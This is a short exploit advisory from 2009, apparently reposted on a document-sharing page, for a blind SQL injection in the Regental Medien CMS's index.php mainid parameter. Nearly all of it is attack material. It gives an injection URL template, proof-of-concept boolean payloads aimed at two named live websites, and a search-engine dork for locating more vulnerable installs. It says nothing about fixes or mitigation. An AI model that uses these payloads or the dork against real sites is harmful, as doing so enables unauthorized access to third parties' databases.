Documents
Resources
Learning Center
Upload
Plans & pricing Sign in
Sign Out

Regental Medien Blind SQL Injection

VIEWS: 38 PAGES: 1

									                                      Regental Medien Blind SQL Injection                              Page 1/1
  1    [o] Regental Medien Blind SQL Injection Vulnerability
  2    Software : Regental Medien
  3    Vendor   : http://www.regental−medien.de/
  4    Author   : NoGe
  5    Home     : http://antisecurity.org
  6
  7    [o] Vulnerable file
  8    index.php
  9
  10   [o] Exploit
  11   http://localhost/[path]/index.php?mainid=[SQL]
  12
  13   [o] Proof of Concept
  14   http://demo15.rm−websystem.de/index.php?mainid=9+and+substring(@@version,1,1)=4 <<   TRUE
  15   http://demo15.rm−websystem.de/index.php?mainid=9+and+substring(@@version,1,1)=5 <<   FALSE
  16   http://www.innenstadterleben.de/index.php?mainid=30+and+substring(@@version,1,1)=4   << TRUE
  17   http://www.innenstadterleben.de/index.php?mainid=30+and+substring(@@version,1,1)=5   << FALSE
  18
  19   [o] Dork
  20   "powered by regental medien"
  21
  22   [o] Note
  23   this is a private script
  24   all target are in one IP address
  25




NoGe                                                                                                   09/24/2009

								
To top